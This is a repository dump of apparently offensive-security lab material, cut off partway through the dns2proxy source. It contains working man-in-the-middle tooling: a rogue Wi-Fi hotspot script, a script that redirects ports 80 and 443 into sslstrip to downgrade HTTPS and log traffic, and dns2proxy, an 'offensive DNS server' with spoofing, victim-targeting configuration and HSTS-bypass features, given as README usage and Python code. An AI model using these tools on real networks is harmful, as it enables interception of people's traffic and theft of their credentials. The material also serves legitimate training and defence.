├── README.md ├── lab2 └── hotspot.sh ├── lab3 └── http-downgrade.sh ├── lab4 ├── dns2proxy │ ├── .gitignore │ ├── IPBouncer.sh │ ├── README.md │ ├── __init__.py │ ├── dns2proxy.py │ ├── dnsalert.txt │ ├── dnslog.txt │ ├── domains.cfg │ ├── fhtagn.sh │ ├── ia.sh │ ├── nospoof.cfg │ ├── nospoofto.cfg │ ├── resolv.conf │ ├── spoof.cfg │ ├── transform.cfg │ └── victims.cfg ├── partial-hsts-bypass.sh └── sslstrip2 │ ├── .gitignore │ ├── COPYING │ ├── README │ ├── README.md │ ├── build │ ├── lib.linux-i686-2.6 │ │ └── sslstrip │ │ │ ├── ClientRequest.py │ │ │ ├── CookieCleaner.py │ │ │ ├── DnsCache.py │ │ │ ├── SSLServerConnection.py │ │ │ ├── ServerConnection.py │ │ │ ├── ServerConnectionFactory.py │ │ │ ├── StrippingProxy.py │ │ │ ├── URLMonitor.py │ │ │ └── __init__.py │ ├── lib.linux-i686-2.7 │ │ └── sslstrip │ │ │ ├── ClientRequest.py │ │ │ ├── CookieCleaner.py │ │ │ ├── DnsCache.py │ │ │ ├── SSLServerConnection.py │ │ │ ├── ServerConnection.py │ │ │ ├── ServerConnectionFactory.py │ │ │ ├── StrippingProxy.py │ │ │ ├── URLMonitor.py │ │ │ └── __init__.py │ ├── scripts-2.6 │ │ └── sslstrip │ └── scripts-2.7 │ │ └── sslstrip │ ├── debug_ssl.log │ ├── lock.ico │ ├── poc.log │ ├── setup.py │ ├── sslstrip.log │ ├── sslstrip.py │ └── sslstrip │ ├── ClientRequest.py │ ├── CookieCleaner.py │ ├── DnsCache.py │ ├── SSLServerConnection.py │ ├── ServerConnection.py │ ├── ServerConnectionFactory.py │ ├── StrippingProxy.py │ ├── URLMonitor.py │ └── __init__.py ├── lab5 └── instructions.txt ├── lab6 └── instructions.txt └── lab7 └── instructions.txt /README.md: -------------------------------------------------------------------------------- 1 | # awae -------------------------------------------------------------------------------- /lab2/hotspot.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # PHY == the network card used to create our access point 4 | phy=wlan0 5 | 6 | # upstream == the network card that serves as our interface to the network 7 | # gateway. To build our NAT, we route packets between PHY and upstream. 8 | upstream=eth0 9 | 10 | # Set bssid to mac addess... really this could be set to any valid bssid. 11 | bssid="$(macchanger -s wlan0 | tail -n1 | awk '{ print $3 }')" 12 | 13 | # set the essid to the first command line argument 14 | essid="$1" 15 | 16 | # set the essid to the second command line argument 17 | channel="$2" 18 | 19 | echo "[*] Starting hotspot script..." 20 | echo "[*] Using configs:" 21 | 22 | echo "[*] --> essid: $essid" 23 | echo "[*] --> bssid: $bssid" 24 | echo "[*] --> channel: $channel" 25 | echo "[*] --> AP interface: $phy" 26 | echo "[*] --> upstream interface: $upstream" 27 | 28 | # Mercilessly destroy interfering processes. There is a more elegent 29 | # way to do this using nmcli, but ain't nobody got time for that shit. ;) 30 | 31 | echo "[*] Stopping NetworkManager..." 32 | systemctl stop network-manager 33 | sleep 3 34 | 35 | # Stopping network-manager will push a soft block on our wireless interfaces. 36 | # We need to undo that. 37 | echo "[*] Removing soft block on wireless interfaces..." 38 | rfkill unblock wlan 39 | 40 | # Stopping network-manager will also disable all of our network interfaces. 41 | # Let's reenable them. 42 | echo "[*] Reenabling $phy interface" 43 | ifconfig $phy up 44 | 45 | # Next we create a hostapd config file. We start by giving hostapd 46 | # an interface with which to create an access point. 47 | echo "[*] Creating hostapd config file...." 48 | echo "interface=$phy" > hostapd.conf 49 | 50 | # Next we specify our ESSID, BSSID, and channel information. 51 | echo "ssid=$essid" >> hostapd.conf 52 | echo "bssid=$bssid" >> hostapd.conf 53 | echo "channel=$channel" >> hostapd.conf 54 | 55 | # Finally, set the hardware mode to g for compatibility with our 56 | # TP-Link cards. 57 | echo "hw_mode=g" >> hostapd.conf 58 | 59 | # Now that we have a config file, start hostapd as a background process. 60 | echo "[*] Starting hostapd" 61 | hostapd ./hostapd.conf & 62 | sleep 7 63 | 64 | 65 | echo "[*] AP started, using IP 10.0.0.1, network 10.0.0.0/24" 66 | # Give our new AP an IP address and subnet mask 67 | ifconfig $phy 10.0.0.1 netmask 255.255.255.0 68 | 69 | # Update routing table to allow rogue AP to serve as default gateway 70 | # of its subnet 71 | route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 72 | 73 | # Next we create our dnsmasq. Remember we're only using dnsmasq as 74 | # a DHCP server at this time. 75 | 76 | echo "[*] Creating dnsmasq config file..." 77 | # The first line in our config defines a DHCP pool of 10.0.0.80 through 78 | # 10.0.0.254, with a DHCP lease 6 hours. 79 | echo "dhcp-range=10.0.0.80,10.0.0.254,6h" > dnsmasq.conf 80 | 81 | # The next line tells dnsmasq to issue a DHCP option that instructs 82 | # new members of the 10.0.0.0/24 network to use Google (8.8.8.8) as 83 | # a DNS server. 84 | echo "dhcp-option=6,8.8.8.8" >> dnsmasq.conf 85 | 86 | # Next, we add a line that tells dnsmasq to issue a DHCP option that 87 | # instructs new member of 10.0.0.0/24 to use our rogue AP as a gateway. 88 | echo "dhcp-option=3,10.0.0.1" >> dnsmasq.conf 89 | 90 | # The next two lines tell dnsmasq to act as an authoritative DHCP server 91 | # and to log DHCP queries. 92 | echo "dhcp-authoritative" >> dnsmasq.conf 93 | echo "log-queries" >> dnsmasq.conf 94 | 95 | 96 | # Finally we start dnsmasq, telling it to use our config file. By default, 97 | # dnsmasq binds to the wildcard address. Since we don't want dnsmasq to do 98 | # this, we keep it from doing so using the -z flag. Additionally, we use 99 | # the -i flag to force dnsmasq to only listen on our $Phy interface. 100 | # We use the -I flag to explicity forbid dnsmasq from running on our 101 | # local interface. 102 | 103 | echo "[*] Starting dnsmasq as DHCP server... DNS set to 8.8.8.8" 104 | dnsmasq -z -p 0 -C ./dnsmasq.conf -i "$phy" -I lo 105 | 106 | # We enable packet forwarding by interacing with the /proc file system. 107 | echo "[*] Enabling packet forwarding" 108 | echo '1' > /proc/sys/net/ipv4/ip_forward 109 | 110 | echo "[*] Performing iptables magic" 111 | 112 | # We set a policy for the INPUT, FORWARD, and OUTPUT chains to accept 113 | # all by default. 114 | iptables --policy INPUT ACCEPT 115 | iptables --policy FORWARD ACCEPT 116 | iptables --policy OUTPUT ACCEPT 117 | 118 | # We then flush all tables to give ourselves a clean slate. 119 | iptables --flush 120 | iptables --table nat --flush 121 | 122 | 123 | # Next we append a rule to the POSTROUTING chain of iptables. Changes 124 | # made to the POSTROUTING chain are not visible to the Linux kernel since 125 | # the chain is applied to every packet before it leaves the system. The rule 126 | # chain that we append to is called MASQUERADE. When applied to a packet, 127 | # the MASQUERADE chain sets the source IP address to the outbound NIC's 128 | # external IP address. This effectively creates an NAT. 129 | 130 | # To summarize, we tell iptables to change the source IP address of each packet 131 | # to that of eth0 and to send each packet to eth0 after this modification 132 | # occurs. 133 | iptables --table nat --append POSTROUTING -o $upstream --jump MASQUERADE 134 | iptables --append FORWARD -i $phy -o $upstream --jump ACCEPT 135 | 136 | read -p 'Hotspot ready. Press enter to quit...' 137 | 138 | # kill the daemon processes that we started earlier 139 | echo "[*] Killing daemons" 140 | for i in `pgrep dnsmasq`; do kill $i; done 141 | for i in `pgrep hostapd`; do kill $i; done 142 | sleep 5 143 | 144 | # We set a policy for the INPUT, FORWARD, and OUTPUT chains to accept 145 | # all by default. 146 | echo "[*] Restoring iptables" 147 | iptables --policy INPUT ACCEPT 148 | iptables --policy FORWARD ACCEPT 149 | iptables --policy OUTPUT ACCEPT 150 | 151 | # We then flush all tables to give ourselves a clean slate. 152 | iptables --flush 153 | iptables --table nat --flush 154 | -------------------------------------------------------------------------------- /lab3/http-downgrade.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # PHY == the network card used to create our access point 4 | phy=wlan0 5 | 6 | # upstream == the network card that serves as our interface to the network 7 | # gateway. To build our NAT, we route packets between PHY and upstream. 8 | upstream=eth0 9 | 10 | # Set bssid to mac addess... really this could be set to any valid bssid. 11 | bssid="$(macchanger -s wlan0 | tail -n1 | awk '{ print $3 }')" 12 | 13 | # set the essid to the first command line argument 14 | essid="$1" 15 | 16 | # set the essid to the second command line argument 17 | channel="$2" 18 | 19 | echo "[*] Starting hotspot script..." 20 | echo "[*] Using configs:" 21 | 22 | echo "[*] --> essid: $essid" 23 | echo "[*] --> bssid: $bssid" 24 | echo "[*] --> channel: $channel" 25 | echo "[*] --> AP interface: $phy" 26 | echo "[*] --> upstream interface: $upstream" 27 | 28 | # Mercilessly destroy interfering processes. There is a more elegent 29 | # way to do this using nmcli, but ain't nobody got time for that shit. ;) 30 | 31 | echo "[*] Stopping NetworkManager..." 32 | systemctl stop network-manager 33 | sleep 3 34 | 35 | # Stopping network-manager will push a soft block on our wireless interfaces. 36 | # We need to undo that. 37 | echo "[*] Removing soft block on wireless interfaces..." 38 | rfkill unblock wlan 39 | 40 | # Stopping network-manager will also disable all of our network interfaces. 41 | # Let's reenable them. 42 | echo "[*] Reenabling $phy interface" 43 | ifconfig $phy up 44 | 45 | # Next we create a hostapd config file. We start by giving hostapd 46 | # an interface with which to create an access point. 47 | echo "[*] Creating hostapd config file...." 48 | echo "interface=$phy" > hostapd.conf 49 | 50 | # Next we specify our ESSID, BSSID, and channel information. 51 | echo "ssid=$essid" >> hostapd.conf 52 | echo "bssid=$bssid" >> hostapd.conf 53 | echo "channel=$channel" >> hostapd.conf 54 | 55 | # Finally, set the hardware mode to g for compatibility with our 56 | # TP-Link cards. 57 | echo "hw_mode=g" >> hostapd.conf 58 | 59 | # Now that we have a config file, start hostapd as a background process. 60 | echo "[*] Starting hostapd" 61 | hostapd ./hostapd.conf & 62 | sleep 7 63 | 64 | echo "[*] AP started, using IP 10.0.0.1, network 10.0.0.0/24" 65 | # Give our new AP an IP address and subnet mask 66 | ifconfig $phy 10.0.0.1 netmask 255.255.255.0 67 | 68 | # Update routing table to allow rogue AP to serve as default gateway 69 | # of its subnet 70 | route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 71 | 72 | # Next we create our dnsmasq. Remember we're only using dnsmasq as 73 | # a DHCP server at this time. 74 | 75 | echo "[*] Creating dnsmasq config file..." 76 | # The first line in our config defines a DHCP pool of 10.0.0.80 through 77 | # 10.0.0.254, with a DHCP lease 6 hours. 78 | echo "dhcp-range=10.0.0.80,10.0.0.254,6h" > dnsmasq.conf 79 | 80 | # The next line tells dnsmasq to issue a DHCP option that instructs 81 | # new members of the 10.0.0.0/24 network to use Google (8.8.8.8) as 82 | # a DNS server. 83 | echo "dhcp-option=6,8.8.8.8" >> dnsmasq.conf 84 | 85 | # Next, we add a line that tells dnsmasq to issue a DHCP option that 86 | # instructs new member of 10.0.0.0/24 to use our rogue AP as a gateway. 87 | echo "dhcp-option=3,10.0.0.1" >> dnsmasq.conf 88 | 89 | # The next two lines tell dnsmasq to act as an authoritative DHCP server 90 | # and to log DHCP queries. 91 | echo "dhcp-authoritative" >> dnsmasq.conf 92 | echo "log-queries" >> dnsmasq.conf 93 | 94 | 95 | # Finally we start dnsmasq, telling it to use our config file. By default, 96 | # dnsmasq binds to the wildcard address. Since we don't want dnsmasq to do 97 | # this, we keep it from doing so using the -z flag. Additionally, we use 98 | # the -i flag to force dnsmasq to only listen on our $Phy interface. 99 | # We use the -I flag to explicity forbid dnsmasq from running on our 100 | # local interface. 101 | 102 | echo "[*] Starting dnsmasq as DHCP server... DNS set to 8.8.8.8" 103 | dnsmasq -z -p 0 -C ./dnsmasq.conf -i "$phy" -I lo 104 | 105 | # We enable packet forwarding by interacing with the /proc file system. 106 | echo "[*] Enabling packet forwarding" 107 | echo '1' > /proc/sys/net/ipv4/ip_forward 108 | 109 | echo "[*] Performing iptables magic" 110 | 111 | # We set a policy for the INPUT, FORWARD, and OUTPUT chains to accept 112 | # all by default. 113 | iptables --policy INPUT ACCEPT 114 | iptables --policy FORWARD ACCEPT 115 | iptables --policy OUTPUT ACCEPT 116 | 117 | # We then flush all tables to give ourselves a clean slate. 118 | iptables --flush 119 | iptables --table nat --flush 120 | 121 | 122 | # Next we append a rule to the POSTROUTING chain of iptables. Changes 123 | # made to the POSTROUTING chain are not visible to the Linux kernel since 124 | # the chain is applied to every packet before it leaves the system. The rule 125 | # chain that we append to is called MASQUERADE. When applied to a packet, 126 | # the MASQUERADE chain sets the source IP address to the outbound NIC's 127 | # external IP address. This effectively creates an NAT. 128 | 129 | # To summarize, we tell iptables to change the source IP address of each packet 130 | # to that of eth0 and to send each packet to eth0 after this modification 131 | # occurs. 132 | iptables --table nat --append POSTROUTING -o $upstream --jump MASQUERADE 133 | iptables --append FORWARD -i $phy -o $upstream --jump ACCEPT 134 | 135 | iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --jump REDIRECT --to-port 10000 136 | iptables --table nat --append PREROUTING --protocol tcp --destination-port 443 --jump REDIRECT --to-port 10000 137 | 138 | iptables --table nat --append POSTROUTING --jump MASQUERADE 139 | 140 | # remove this line if problems and see what happens 141 | #iptables --table nat --append PREROUTING --protocol tcp --destination-port 443 --jump REDIRECT --to-port 10000 142 | 143 | sslstrip -l 10000 -p -w ./sslstrip.log 144 | 145 | read -p 'Hotspot ready. Press enter to quit...' 146 | 147 | # kill the daemon processes that we started earlier 148 | echo "[*] Killing daemons" 149 | killall dnsmasq 150 | killall hostapd 151 | sleep 5 152 | 153 | # We set a policy for the INPUT, FORWARD, and OUTPUT chains to accept 154 | # all by default. 155 | echo "[*] Restoring iptables" 156 | iptables --policy INPUT ACCEPT 157 | iptables --policy FORWARD ACCEPT 158 | iptables --policy OUTPUT ACCEPT 159 | 160 | # We then flush all tables to give ourselves a clean slate. 161 | iptables --flush 162 | iptables --table nat --flush 163 | -------------------------------------------------------------------------------- /lab4/dns2proxy/.gitignore: -------------------------------------------------------------------------------- 1 | .idea -------------------------------------------------------------------------------- /lab4/dns2proxy/IPBouncer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # TCP Proxy using IPTables 3 | # tcpproxy LOCAL_IP LOCAL_PORT REMOTE_IP REMOTE_PORT 4 | 5 | IPTABLES=/sbin/iptables 6 | 7 | echo 1 > /proc/sys/net/ipv4/ip_forward 8 | sysctl net.ipv4.conf.all.forwarding=1 9 | # Flush nat table 10 | $IPTABLES -t nat -F 11 | 12 | # tcpproxy LOCAL_IP LOCAL_PORT REMOTE_IP REMOTE_PORT 13 | listen_address=$1 14 | listen_port=$2 15 | source_address=$1 16 | # source_port=$4 17 | destination_address=$3 18 | destination_port=$4 19 | 20 | $IPTABLES -t nat -A PREROUTING --dst $listen_address -p tcp --dport $listen_port -j DNAT --to-destination $destination_address:$destination_port 21 | $IPTABLES -t nat -A POSTROUTING -j MASQUERADE 22 | -------------------------------------------------------------------------------- /lab4/dns2proxy/README.md: -------------------------------------------------------------------------------- 1 | dns2proxy 2 | ========= 3 | 4 | Offensive DNS server 5 | 6 | This tools offer a different features for post-explotation once you change the DNS server to a Victim. 7 | 8 | 9 | Feature 1 10 | --------- 11 | 12 | Traditional DNS Spoof adding to the response the original IP address. 13 | 14 | Using spoof.cfg file: 15 | 16 | hostname ip.ip.ip.ip 17 | 18 | >root@kali:~/dns2proxy# echo "www.s21sec.com 1.1.1.1" > spoof.cfg 19 | > 20 | >// launch in another terminal dns2proxy.py 21 | > 22 | >root@kali:~/dns2proxy# nslookup www.s21sec.com 127.0.0.1 23 | >Server: 127.0.0.1 24 | >Address: 127.0.0.1#53 25 | > 26 | >Name: www.s21sec.com 27 | >Address: 1.1.1.1 28 | >Name: www.s21sec.com 29 | >Address: 88.84.64.30 30 | 31 | 32 | or you can use domains.cfg file to spoof all host of a same domain: 33 | 34 | >root@kali:~/demoBH/dns2proxy# cat dominios.cfg 35 | >.domain.com 192.168.1.1 36 | > 37 | >root@kali:~/demoBH/dns2proxy# nslookup aaaa.domain.com 127.0.0.1 38 | >Server: 127.0.0.1 39 | >Address: 127.0.0.1#53 40 | > 41 | >Name: aaaa.domain.com 42 | >Address: 192.168.1.1 43 | 44 | Hostnames at nospoof.cfg will no be spoofed. 45 | 46 | Feature 2 47 | --------- 48 | 49 | This feature implements the attack of DNS spoofing adding 2 IP address at the top of the resolution and configuring the system to forward the connections. 50 | Check my slides at BlackHat Asia 2014 [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES] (http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and the [Demo Video] (http://www.youtube.com/watch?v=cJtbxX1HS5I). 51 | 52 | To launch this attach there is a shellscript that automatically configure the system using IP tables. You must edit this file to adapt it to your system. DON´T FORGET AdminIP variable!!!! 53 | Both IPs must be at the same system to let dns2proxy.py configurate the forwarding 54 | 55 | Usage: ia.sh < interface > [ip1] [ip2] 56 | 57 | 58 | >root@kali:~/dns2proxy# ./ia.sh eth0 172.16.48.128 172.16.48.230 59 | >Non spoofing imap.gmail.com 60 | >Non spoofing mail.s21sec.com 61 | >Non spoofing www.google.com 62 | >Non spoofing www.apple.com 63 | >Non spoofing ccgenerals.ms19.gamespy.com 64 | >Non spoofing master.gamespy.com 65 | >Non spoofing gpcm.gamespy.com 66 | >Non spoofing launch.gamespyarcade.com 67 | >Non spoofing peerchat.gamespy.com 68 | >Non spoofing gamestats.gamespy.com 69 | >Specific host spoofing www.s21sec.com with 1.1.1.1 70 | >Specific domain IP .domain.com with 192.168.1.1 71 | >binded to UDP port 53. 72 | >waiting requests. 73 | >Starting sniffing in (eth0 = 172.16.48.128).... 74 | > 75 | >< at other terminal > 76 | > 77 | >root@kali:~/dns2proxy# nslookup www.microsoft.com 127.0.0.1 78 | >Server: 127.0.0.1 79 | >Address: 127.0.0.1#53 80 | > 81 | >Name: www.microsoft.com 82 | >Address: 172.16.48.128 83 | >Name: www.microsoft.com 84 | >Address: 172.16.48.230 85 | >Name: www.microsoft.com 86 | >Address: 65.55.57.27 87 | 88 | 89 | The fhtang.sh script will terminate the program and restore normal iptables. 90 | 91 | Hostnames at nospoof.cfg will no be spoofed. 92 | 93 | 94 | Feature 3 95 | --------- 96 | 97 | Automatically the dns server detects and correct the changes thats my sslstrip+ do to the hostnames to avoid HSTS, so will response properly. 98 | 99 | This server is necesary to make the sslstrip+ attack. 100 | 101 | >root@kali:~/dns2proxy# nslookup webaccounts.google.com 127.0.0.1 <-- DNS response like accounts.google.com 102 | >Server: 127.0.0.1 103 | >Address: 127.0.0.1#53 104 | > 105 | >Name: webaccounts.google.com 106 | >Address: 172.16.48.128 107 | >Name: webaccounts.google.com 108 | >Address: 172.16.48.230 109 | >Name: webaccounts.google.com 110 | >Address: 74.125.200.84 111 | > 112 | >root@kali:~/dns2proxy# nslookup wwww.yahoo.com 127.0.0.1 <-- Take care of the 4 w! DNS response like 113 | >Server: 127.0.0.1 www.yahoo.com 114 | >Address: 127.0.0.1#53 115 | > 116 | >Name: wwww.yahoo.com 117 | >Address: 172.16.48.128 118 | >Name: wwww.yahoo.com 119 | >Address: 172.16.48.230 120 | >Name: wwww.yahoo.com 121 | >Address: 68.142.243.179 122 | >Name: wwww.yahoo.com 123 | >Address: 68.180.206.184 124 | 125 | 126 | Installation 127 | ------------ 128 | 129 | dnspython (www.dnspython.com) is needed. 130 | Tested with Python 2.6 and Python 2.7. 131 | 132 | 133 | Importing Dns2Proxy as a Python module 134 | -------------------------------------- 135 | 136 | Dns2proxy can be imported and run within a Python script or larger project. To use Dns2proxy as a module, 137 | first import it within your project file: 138 | 139 | ```python 140 | 141 | import dns2proxy 142 | 143 | ``` 144 | 145 | Then start it by making a call to dns2proxy.run() as shown below, passing your network interface as an argument: 146 | 147 | ```python 148 | 149 | import dns2proxy 150 | dns2proxy.run(interface='wlan0') 151 | 152 | ``` 153 | 154 | Note that dns2proxy.run() is a blocking call, and that running dns2proxy in parallel with other modules such as 155 | sslstrip2 requires the use of daemon processes. For example: 156 | 157 | 158 | ```python 159 | 160 | import dns2proxy 161 | from multiprocessing import Process 162 | 163 | def run_dns2proxy(interface): 164 | 165 | dns2proxy.run(interface=interface) 166 | 167 | p = Process(target=dns2proxy.run, args=('wlan0',)) 168 | p.start() 169 | 170 | print 'Run the rest of your code here' 171 | 172 | p.stop() 173 | 174 | 175 | ``` 176 | 177 | 178 | Config files description 179 | ------------------------ 180 | 181 | domains.cfg (or dominios.cfg): resolve all hosts for the listed domains with the listed IP 182 | >Ex: 183 | >.facebook.com 1.2.3.4 184 | >.fbi.gov 1.2.3.4 185 | 186 | spoof.cfg : Spoof a host with a ip 187 | >Ex: 188 | >www.nsa.gov 127.0.0.1 189 | 190 | nospoof.cfg: Send always a legit response when asking for these hosts. 191 | >Ex. 192 | >mail.google.com 193 | 194 | nospoofto.cfg: Don't send fake responses to the IPs listed there. 195 | >Ex: 196 | >127.0.0.1 197 | >4.5.6.8 198 | 199 | victims.cfg: If not empty, only send fake responses to these IP addresses. 200 | >Ex: 201 | >23.66.163.36 202 | >195.12.226.131 203 | 204 | resolv.conf: DNS server to forward the queries. 205 | >Ex: 206 | >nameserver 8.8.8.8 207 | 208 | -------------------------------------------------------------------------------- /lab4/dns2proxy/__init__.py: -------------------------------------------------------------------------------- 1 | from dns2proxy import run 2 | -------------------------------------------------------------------------------- /lab4/dns2proxy/dns2proxy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2.6 2 | ''' 3 | dns2proxy for offensive cybersecurity v1.0 4 | 5 | 6 | python dns2proxy.py -h for Usage. 7 | 8 | Example: 9 | python2.6 dns2proxy.py -i eth0 -u 192.168.1.101 -d 192.168.1.200 10 | 11 | Example for no forwarding (only configured domain based queries and spoofed hosts): 12 | python2.6 dns2proxy.py -i eth0 -noforward 13 | 14 | Example for no forwarding but add IPs 15 | python dns2proxy.py -i eth0 -I 192.168.1.101,90.1.1.1,155.54.1.1 -noforward 16 | 17 | Author: Leonardo Nve ( leonardo.nve@gmail.com) 18 | ''' 19 | 20 | 21 | import dns.message 22 | import dns.rrset 23 | import dns.resolver 24 | import socket 25 | import numbers 26 | import threading 27 | from struct import * 28 | import datetime 29 | import pcapy 30 | import os 31 | import signal 32 | import errno 33 | from time import sleep 34 | import argparse 35 | 36 | 37 | consultas = {} 38 | spoof = {} 39 | dominios = {} 40 | transformation = {} 41 | nospoof = [] 42 | nospoofto = [] 43 | victims = [] 44 | Forward = None 45 | 46 | configs_path = os.path.dirname(os.path.realpath(__file__)) 47 | 48 | LOGREQFILE = "%s/dnslog.txt" % configs_path 49 | LOGSNIFFFILE = "%s/snifflog.txt" % configs_path 50 | LOGALERTFILE = "%s/dnsalert.txt" % configs_path 51 | RESOLVCONF = "%s/resolv.conf" % configs_path 52 | victim_file = "%s/victims.cfg" % configs_path 53 | nospoof_file = "%s/nospoof.cfg" % configs_path 54 | nospoofto_file = "%s/nospoofto.cfg" % configs_path 55 | specific_file = "%s/spoof.cfg" % configs_path 56 | dominios_file = "%s/domains.cfg" % configs_path 57 | transform_file = "%s/transform.cfg" % configs_path 58 | 59 | 60 | ###################### 61 | # GENERAL SECTION # 62 | ###################### 63 | 64 | 65 | def save_req(lfile, str): 66 | f = open(lfile, "a") 67 | f.write(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' ' + str) 68 | f.close() 69 | 70 | 71 | def SIGUSR1_handle(signalnum, frame): 72 | global noserv 73 | global Resolver 74 | noserv = 0 75 | DEBUGLOG('Reconfiguring....') 76 | process_files() 77 | Resolver.reset() 78 | Resolver.read_resolv_conf(RESOLVCONF) 79 | return 80 | 81 | 82 | def process_files(): 83 | global nospoof 84 | global spoof 85 | global nospoof_file 86 | global specific_file 87 | global dominios_file 88 | global dominios 89 | global nospoofto_file 90 | global transform_file 91 | 92 | for i in nospoof[:]: 93 | nospoof.remove(i) 94 | 95 | for i in nospoofto[:]: 96 | nospoofto.remove(i) 97 | 98 | for i in victims[:]: 99 | victims.remove(i) 100 | 101 | dominios.clear() 102 | spoof.clear() 103 | 104 | nsfile = open(nospoof_file, 'r') 105 | for line in nsfile: 106 | if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line 107 | continue 108 | h = line.split() 109 | if len(h) > 0: 110 | DEBUGLOG('Non spoofing ' + h[0]) 111 | nospoof.append(h[0]) 112 | 113 | nsfile.close() 114 | 115 | nsfile = open(victim_file, 'r') 116 | for line in nsfile: 117 | if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line 118 | continue 119 | h = line.split() 120 | if len(h) > 0: 121 | DEBUGLOG('Spoofing only to ' + h[0]) 122 | victims.append(h[0]) 123 | 124 | nsfile.close() 125 | 126 | nsfile = open(nospoofto_file, 'r') 127 | for line in nsfile: 128 | if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line 129 | continue 130 | h = line.split() 131 | if len(h) > 0: 132 | DEBUGLOG('Non spoofing to ' + h[0]) 133 | nospoofto.append(h[0]) 134 | 135 | nsfile.close() 136 | 137 | nsfile = open(specific_file, 'r') 138 | for line in nsfile: 139 | if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line 140 | continue 141 | h = line.split() 142 | if len(h) > 1: 143 | DEBUGLOG('Specific host spoofing ' + h[0] + ' with ' + h[1]) 144 | spoof[h[0]] = h[1] 145 | 146 | nsfile.close() 147 | nsfile = open(dominios_file, 'r') 148 | for line in nsfile: 149 | if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line 150 | continue 151 | h = line.split() 152 | if len(h) > 1: 153 | DEBUGLOG('Specific domain IP ' + h[0] + ' with ' + h[1]) 154 | dominios[h[0]] = h[1] 155 | 156 | nsfile.close() 157 | 158 | nsfile = open(transform_file, 'r') 159 | for line in nsfile.readlines(): 160 | if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line 161 | continue 162 | line = line.rstrip() 163 | from_host = line.split(':')[0] 164 | to_host = line.split(':')[1] 165 | transformation[from_host] = to_host 166 | 167 | nsfile.close() 168 | 169 | return 170 | 171 | 172 | def DEBUGLOG(str): 173 | global debug 174 | if debug: 175 | print str 176 | return 177 | 178 | 179 | def handler_msg(id): 180 | #os.popen('executeScript %s &'%id) 181 | return 182 | 183 | ###################### 184 | # SNIFFER SECTION # 185 | ###################### 186 | 187 | class ThreadSniffer(threading.Thread): 188 | def __init__(self): 189 | threading.Thread.__init__(self) 190 | 191 | def run(self): 192 | #DEBUGLOG( self.getName(), " Sniffer Waiting connections....") 193 | go() 194 | 195 | def go(): 196 | global ip1 197 | global dev 198 | bpffilter = "dst host %s and not src host %s and !(tcp dst port 80 or tcp dst port 443) and (not host %s)" % ( 199 | ip1, ip1, adminip) 200 | cap = pcapy.open_live(dev, 255, 1, 0) 201 | cap.setfilter(bpffilter) 202 | DEBUGLOG( "Starting sniffing in (%s = %s)...." % (dev, ip1)) 203 | 204 | #start sniffing packets 205 | while True: 206 | try: 207 | (header, packet) = cap.next() 208 | parse_packet(packet) 209 | except: 210 | pass 211 | #DEBUGLOG( ('%s: captured %d bytes, truncated to %d bytes' %(datetime.datetime.now(), header.getlen(), header.getcaplen()))) 212 | 213 | #function to parse a packet 214 | def parse_packet(packet): 215 | eth_length = 14 216 | eth_protocol = 8 217 | global ip1 218 | global consultas 219 | global ip2 220 | 221 | #Parse IP packets, IP Protocol number = 8 222 | if eth_protocol == 8: 223 | #Parse IP header 224 | #take first 20 characters for the ip header 225 | ip_header = packet[eth_length:20 + eth_length] 226 | 227 | #now unpack them :) 228 | iph = unpack('!BBHHHBBH4s4s', ip_header) 229 | 230 | version_ihl = iph[0] 231 | #version = version_ihl >> 4 232 | ihl = version_ihl & 0xF 233 | 234 | iph_length = ihl * 4 235 | 236 | #ttl = iph[5] 237 | protocol = iph[6] 238 | s_addr = socket.inet_ntoa(iph[8]) 239 | d_addr = socket.inet_ntoa(iph[9]) 240 | 241 | 242 | 243 | #TCP protocol 244 | if protocol == 6: 245 | t = iph_length + eth_length 246 | tcp_header = packet[t:t + 20] 247 | 248 | #now unpack them :) 249 | tcph = unpack('!HHLLBBHHH', tcp_header) 250 | 251 | source_port = tcph[0] 252 | dest_port = tcph[1] 253 | # sequence = tcph[2] 254 | # acknowledgement = tcph[3] 255 | # doff_reserved = tcph[4] 256 | # tcph_length = doff_reserved >> 4 257 | 258 | 259 | 260 | if consultas.has_key(str(s_addr)): 261 | DEBUGLOG(' ==> Source Address : ' + str(s_addr) + ' * Destination Address : ' + str(d_addr)) 262 | DEBUGLOG(' Source Port : ' + str(source_port) + ' * Dest Port : ' + str(dest_port)) 263 | # print '>>>> '+str(s_addr)+' esta en la lista!!!!.....' 264 | comando = 'sh ./IPBouncer.sh %s %s %s %s' % ( 265 | ip2, str(dest_port), consultas[str(s_addr)], str(dest_port)) 266 | os.system(comando) 267 | #print '>>>> ' + comando 268 | comando = '/sbin/iptables -D INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % ( 269 | ip1, str(dest_port), str(s_addr), str(source_port)) 270 | os.system(comando) 271 | comando = '/sbin/iptables -A INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % ( 272 | ip1, str(dest_port), str(s_addr), str(source_port)) 273 | os.system(comando) 274 | #print '>>>> ' + comando 275 | 276 | #UDP packets 277 | elif protocol == 17: 278 | u = iph_length + eth_length 279 | #udph_length = 8 280 | #udp_header = packet[u:u + 8] 281 | #now unpack them :) 282 | #udph = unpack('!HHHH', udp_header) 283 | #source_port = udph[0] 284 | #dest_port = udph[1] 285 | #length = udph[2] 286 | #checksum = udph[3] 287 | #DEBUGLOG('Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Length : ' + str(length) + ' Checksum : ' + str(checksum)) 288 | #h_size = eth_length + iph_length + udph_length 289 | #data_size = len(packet) 